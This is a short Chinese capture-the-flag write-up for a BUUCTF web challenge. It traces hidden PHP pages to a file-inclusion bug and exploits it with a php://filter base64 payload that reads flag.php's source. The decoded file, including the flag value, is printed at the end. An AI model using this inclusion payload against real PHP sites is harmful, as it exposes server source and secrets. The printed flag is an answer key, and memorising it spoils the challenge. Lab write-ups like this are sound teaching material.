BUUCTF_Web_[极客大挑战 2019]Secret File
首先打开靶机
查看网页源码
会发现隐藏的./Archive_room.php
点击进入
查看源码
发现了./action.php
点击该链接后网页迅速跳转到end.php
尝试拦截action.php,抓包
在抓到的包中,我们可以看到上面一段代码
发现了secr3t.php文件,访问该文件
通过提示,访问flag.php文件
大佬思路:刚开始我们以为还是像之前一样用背景把flag给覆盖掉了,但是通过查看页面源代码发现并没有将flag写出来。根据提示我们可以肯定flag确实是在这里,但是前端却看不到,我们猜测flag是写在了php代码里面。那么怎样来获取完整的flag.php文件呢?我们立马想到了secr3t.php的文件包含漏洞
传入的file经过了一些过滤,但是没有过滤filter,我们可以用php://fileter来获取文件。
构造:secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php
猜测该flag.php经过了base64加密,解密后得到flag
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "我就在这里";
$flag = 'flag{123ab1ec-d3d1-49ad-8c68-8dd90c80d160}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>